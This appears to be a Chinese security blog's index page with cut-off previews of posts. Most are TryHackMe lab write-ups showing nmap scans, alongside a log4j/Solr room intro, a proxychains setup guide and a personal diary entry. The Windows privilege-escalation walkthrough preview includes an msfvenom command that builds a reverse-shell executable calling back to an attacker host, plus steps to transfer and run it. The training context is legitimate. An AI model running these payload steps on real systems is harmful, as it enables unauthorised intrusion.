log4jexploitTHM
侦察发现此目标计算机正在运行ApacheSolr 8.11.0,这是已知包含此易受攻击的log4j包的软件的一个示例。为了展示此漏洞,该应用程序在Java 1.8.0_181上运行。
浏览可在http://10.10.115.197:8983访问的Web界面 ,并单击周围以感受应用程序。有关ApacheSolr的更多详细信息,请参阅其官方网站。https://solr.apache.org/](https://solr.apache.org/)
这个ApacheSolr实例没有提供任何数据。它是一个平坦的,香草的,绝对最小的安装-但在其核心,它仍然容易受到这个CVE-2021-44228的攻击。
一个文件有大量的INFO条目,显示对一个特定URL端点的重复请求。哪个文件包含这个重复的条目?(Just文件名本身,不需要路径)
solr.log
在这些重复的条目中指示了什么“路径”或URL端点 ...
NAT配置以及kali使用proxychains实现代理
前言kali的代理还是令人头疼了很久,之前试过在kali直接使用clash,但是感觉不是很稳定。
所以利用proxychains走宿主机的流量来实现代理。并且之前采用一些文章说要开启WALN网卡与VM8(NAT)网卡的网络共享,实际上并不需要而且还会造成物理机和虚拟机之间不在同一个网段ping不通的情况。
NAT设置
左上角:编辑->虚拟网络编辑器
选用VMnet8这张网卡,子网IP设置为192.168.xxx.0,“xxx”自己随便取一个,我这里采用233
这里设置网关IP,更改最后一位,这里我填写2,然后右下角确定
这里确定虚拟机IP的C段,我选用的是3->10,根据自己的虚拟机数量确定分配的IP数量,然后右下角确定
接下来配置物理机:
点击左下角的WIN图标。搜索“查看网络连接”
可以看到有几张网卡,右键VMnet8这张网卡,右键->属性
双击IPv4,然后手动设置物理机的IP,注意,不要和之前设置的网关IP和虚拟机的IP网段冲突,我这里设置为1,然后右下角确定。
WIN10,WIN11默认是不开启PING回应的,我们需要验证我们的NAT配置 ...
打靶记录(五一)之THMCherryBlossom
端口扫描sudo nmap --min-rate 10000 -p- 10.10.2.67 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 14:47 UTCNmap scan report for 10.10.2.67Host is up (0.24s latency).Not shown: 65532 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh139/tcp open netbios-ssn445/tcp open microsoft-ds
sudo nmap -sT -sV -sC -O -p22,139,445 10.10.2.67[sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 14:49 UTCNmap scan report for 10.10.2.67Host is up (0.2 ...
23-9杂谈
又是在国庆返校的路上记下这篇九月记,虽然已经十月过了好几天了233。缘于开学,九月还是比较忙碌的吧,第一次体验护网的坐牢,虽然说整个过程还算是有趣吧233然后也还有各种事,国庆放假才算是稍微闲了点下来吧。域的学习有所进展,并且开启了二进制的学习,不过并不打算学得非常深入,大概学到能把thm的二进制渗透利用能解决的水平吧,也是非常有趣的一个方向。还有就是开始验证一年多来编曲学习的效果了,开始写了一点完整度还算不错的,个人还蛮喜欢的一首曲子www,还想尽量写的更丰富,至少尽可能地写到目前水平的max。接下来几个月也许会更加有趣吧,总之最近的日子就是这样平淡的有趣和大部分的空虚。
打靶记录(五十)之THMForBusinessReasons
端口扫描sudo nmap --min-rate 10000 -p- 10.10.89.151 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 03:20 UTCNmap scan report for 10.10.89.151Host is up (0.26s latency).Not shown: 65531 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp closed ssh80/tcp open http2377/tcp closed swarm7946/tcp closed unknown
sudo nmap -sT -sV -sC -O -p80 10.10.89.151 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-07 03:21 UTCNmap sc ...
打靶记录(四九)之THMM4tr1xExitDenied
端口扫描sudo nmap --min-rate 10000 -p- 10.10.33.27Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-05 12:01 CSTWarning: 10.10.33.27 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.33.27 (10.10.33.27)Host is up (0.30s latency).Not shown: 56561 closed tcp ports (reset), 8971 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp open ssh80/tcp open http3306/tcp open mysqlNmap done: 1 IP address (1 host up) scanned in 51.43 seconds
sudo nmap -sT -sV -sC ...
打靶记录(四八)之THMJurassicPark
端口扫描sudo nmap --min-rate 10000 -p- 10.10.234.139 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:13 CSTNmap scan report for 10.10.234.139 (10.10.234.139)Host is up (0.28s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 park.thm Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-04 20:14 CSTNmap scan report for park.thm (10.10.234.139)Host is up (0.27s latency).PORT STATE SE ...
打靶记录(四七)之THMTheGreatEscape
端口扫描sudo nmap --min-rate 10000 -p- 10.10.179.159 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-25 21:03 CSTNmap scan report for 10.10.179.159Host is up (0.25s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http
sudo nmap -sT -sV -sC -O -p22,80 10.10.70.210 [sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-03 00:02 CSTNmap scan report for 10.10.7 ...
THMWindowsPrivEsc房间walkthrough
xfreerdp /u:user /p:password321 /v:10.10.169.4 /dynamic-resolution
生成反向Shell可执行文件msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.38.245 LPORT=1234 -f exe -o reverse.exe
生成exe反弹shell
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .
开启一个本地SMB共享服务器用于传输文件,共享名叫作kali
CMD中:
copy \\10.11.38.245\kali\reverse.exe C:\PrivEsc\reverse.exe
kali开启监听
cmd执行:
C:\PrivEsc\reverse.exe
收到反弹shell
服务漏洞不安全的服务权限C:\PrivEsc\accesschk.exe /accepteula -uwcqv user daclsvc
使用accesschk.exe检查“u ...
打靶记录(四六)之THMAttacktiveDirectory
端口扫描sudo nmap --min-rate 10000 -p- 10.10.55.102[sudo] mikannse 的密码:Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-24 21:23 CSTWarning: 10.10.55.102 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.55.102Host is up (0.25s latency).Not shown: 64327 closed tcp ports (reset), 1182 filtered tcp ports (no-response)PORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp ope ...
打靶记录(四五)之THMBorderLands
端口扫描sudo nmap --min-rate 10000 -p- 10.10.36.235Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 19:55 CSTNmap scan report for 10.10.36.235Host is up (0.26s latency).Not shown: 65532 filtered tcp ports (no-response)PORT STATE SERVICE22/tcp open ssh80/tcp open http8080/tcp closed http-proxy
sudo nmap -sT -sV -sC -O -p22,80,8080 10.10.36.235 Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-21 19:56 CSTNmap scan report for 10.10.36.235Host is up (0.21s latency).PORT STATE S ...
打靶记录(四四)之THMFusionCorp
端口扫描Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-20 12:43 CSTNmap scan report for 10.10.2.72Host is up (0.26s latency).Not shown: 65512 filtered tcp ports (no-response)PORT STATE SERVICE53/tcp open domain80/tcp open http88/tcp open kerberos-sec135/tcp open msrpc139/tcp open netbios-ssn389/tcp open ldap445/tcp open microsoft-ds464/tcp open kpasswd5593/tcp open http-rpc-epmap636/tcp open ldapssl3268/tcp open globalcatLDAP3269/tcp open globalcatLDAPss ...